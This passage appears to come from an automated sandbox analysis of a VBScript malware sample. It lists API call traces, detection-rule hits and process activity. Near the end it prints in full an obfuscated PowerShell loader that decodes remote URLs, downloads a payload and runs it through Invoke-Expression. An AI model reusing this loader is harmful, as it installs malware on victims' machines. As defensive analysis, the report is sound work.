M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,14_3_00007DF45262F180
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E25C NtAcceptConnectPort,14_3_00007DF45262E25C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262F32C NtAcceptConnectPort,free,14_3_00007DF45262F32C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E094 NtAcceptConnectPort,14_3_00007DF45262E094
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E170 NtAcceptConnectPort,14_3_00007DF45262E170
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E150 NtAcceptConnectPort,14_3_00007DF45262E150
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E3E8 NtAcceptConnectPort,14_3_00007DF45262E3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E3C8 NtAcceptConnectPort,14_3_00007DF45262E3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,14_3_00007DF45262E910
                        Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024F6A2A1CF4 NtAcceptConnectPort,CloseHandle,14_2_0000024F6A2A1CF4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024F6A2A15C0 NtAcceptConnectPort,14_2_0000024F6A2A15C0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_3_00007DF424A01CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,21_3_00007DF424A01CE8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_3_00007DF424A01958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,21_3_00007DF424A01958
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A3158 NtAcceptConnectPort,21_2_00000207587A3158
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2A20 NtAcceptConnectPort,21_2_00000207587A2A20
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2CAC NtAcceptConnectPort,21_2_00000207587A2CAC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2D80 NtAcceptConnectPort,21_2_00000207587A2D80
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2DDC NtAcceptConnectPort,21_2_00000207587A2DDC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2DAC NtAcceptConnectPort,21_2_00000207587A2DAC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2E84 NtAcceptConnectPort,21_2_00000207587A2E84
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A2EC8 NtAcceptConnectPort,21_2_00000207587A2EC8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A290C NtAcceptConnectPort,21_2_00000207587A290C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A12E90 NtQuerySystemInformation,NtQuerySystemInformation,21_2_00007DF424A12E90
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A425D4 NtQuerySystemInformation,NtQuerySystemInformation,21_2_00007DF424A425D4
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC26B9554_2_00007FFAAC26B955
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC26ABA54_2_00007FFAAC26ABA5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC338B9A4_2_00007FFAAC338B9A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D4E9287_2_04D4E928
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D4F1F87_2_04D4F1F8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D4E5E07_2_04D4E5E0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07B1D0207_2_07B1D020
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B5E9414_3_0000024F6A3B5E94
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B559414_3_0000024F6A3B5594
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B591414_3_0000024F6A3B5914
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B250D14_3_0000024F6A3B250D
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B2C5214_3_0000024F6A3B2C52
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B4A5014_3_0000024F6A3B4A50
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B1BBC14_3_0000024F6A3B1BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_0000024F6A3B27B214_3_0000024F6A3B27B2
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45263D42C14_3_00007DF45263D42C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45260286C14_3_00007DF45260286C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526208CC14_3_00007DF4526208CC
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526121F014_3_00007DF4526121F0
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EA19C14_3_00007DF4526EA19C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45267D24814_3_00007DF45267D248
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45266D2A014_3_00007DF45266D2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526552F414_3_00007DF4526552F4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526F32F814_3_00007DF4526F32F8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452605F9C14_3_00007DF452605F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45265FF7814_3_00007DF45265FF78
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45260105814_3_00007DF452601058
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526210BC14_3_00007DF4526210BC
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EE0B014_3_00007DF4526EE0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526FA59814_3_00007DF4526FA598
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526E757814_3_00007DF4526E7578
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45265564014_3_00007DF452655640
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EE5F414_3_00007DF4526EE5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526ED75C14_3_00007DF4526ED75C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45268071C14_3_00007DF45268071C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526343E414_3_00007DF4526343E4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526E23D814_3_00007DF4526E23D8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526AA3C814_3_00007DF4526AA3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526713BC14_3_00007DF4526713BC
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526A19B414_3_00007DF4526A19B4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45260F9C014_3_00007DF45260F9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452660AD414_3_00007DF452660AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452617AE014_3_00007DF452617AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526FAAB414_3_00007DF4526FAAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45266CB5C14_3_00007DF45266CB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452648B2814_3_00007DF452648B28
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EEB0C14_3_00007DF4526EEB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EE77414_3_00007DF4526EE774
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45267582414_3_00007DF452675824
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45261E97014_3_00007DF45261E970
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45265395C14_3_00007DF45265395C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45266CE4814_3_00007DF45266CE48
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526FDF6C14_3_00007DF4526FDF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452620EF414_3_00007DF452620EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452656BE414_3_00007DF452656BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45262CBE814_3_00007DF45262CBE8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526DDBC814_3_00007DF4526DDBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EBC6814_3_00007DF4526EBC68
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452653CE814_3_00007DF452653CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526EDC9414_3_00007DF4526EDC94
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45265CC8414_3_00007DF45265CC84
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45266CD3814_3_00007DF45266CD38
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45265ECF814_3_00007DF45265ECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024F6A2A0C7014_2_0000024F6A2A0C70
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_3_00007DF424A04EFC21_3_00007DF424A04EFC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_3_00007DF424A0392C21_3_00007DF424A0392C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_3_00007DF424A0220421_3_00007DF424A02204
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A321821_2_00000207587A3218
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_000002075879C2D021_2_000002075879C2D0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_000002075879262C21_2_000002075879262C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587CF9A421_2_00000207587CF9A4
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587CF15821_2_00000207587CF158
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C522421_2_00000207587C5224
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D422121_2_00000207587D4221
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C420C21_2_00000207587C420C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D0A4421_2_00000207587D0A44
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A723421_2_00000207587A7234
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587AEABC21_2_00000207587AEABC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C4B6021_2_00000207587C4B60
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D6C0821_2_00000207587D6C08
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587AE40421_2_00000207587AE404
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587CD3C821_2_00000207587CD3C8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C0C4C21_2_00000207587C0C4C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B74EC21_2_00000207587B74EC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587914D021_2_00000207587914D0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587CF4B821_2_00000207587CF4B8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C5D8421_2_00000207587C5D84
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A758021_2_00000207587A7580
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D156421_2_00000207587D1564
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587AFD3C21_2_00000207587AFD3C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587AC5D821_2_00000207587AC5D8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C55BC21_2_00000207587C55BC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C9DA821_2_00000207587C9DA8
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C669C21_2_00000207587C669C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B8E8821_2_00000207587B8E88
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B467821_2_00000207587B4678
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587ACE7021_2_00000207587ACE70
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B7E5821_2_00000207587B7E58
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C474421_2_00000207587C4744
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587AD73021_2_00000207587AD730
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587CAFF021_2_00000207587CAFF0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587A5FCC21_2_00000207587A5FCC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C50A421_2_00000207587C50A4
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B089821_2_00000207587B0898
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587B786821_2_00000207587B7868
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D104821_2_00000207587D1048
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587BE02821_2_00000207587BE028
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587D011421_2_00000207587D0114
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00000207587C60EC21_2_00000207587C60EC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A1F04821_2_00007DF424A1F048
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A227AC21_2_00007DF424A227AC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A2152C21_2_00007DF424A2152C
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A29C7421_2_00007DF424A29C74
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A1F8E021_2_00007DF424A1F8E0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A201A021_2_00007DF424A201A0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A2330821_2_00007DF424A23308
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A2728D21_2_00007DF424A2728D
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A20E7421_2_00007DF424A20E74
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A49C1821_2_00007DF424A49C18
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A4720021_2_00007DF424A47200
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A48FDC21_2_00007DF424A48FDC
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A4848021_2_00007DF424A48480
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_00007DF424A622CC21_2_00007DF424A622CC
                        Source: ab.vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4296
                        Source: unknownProcess created: Commandline size = 4296
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4296Jump to behavior
                        Source: amsi32_8060.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 8060, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: 14.3.svchost.exe.24f6aabc070.3.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                        Source: 14.3.svchost.exe.24f6aabc070.0.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                        Source: 14.3.svchost.exe.24f6aabc070.1.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                        Source: 14.3.svchost.exe.24f6aabc070.2.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@44/120@13/11
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45260286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,14_3_00007DF45260286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Nonfattening.RetJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3jrpzey.xgu.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7696
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8060
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. 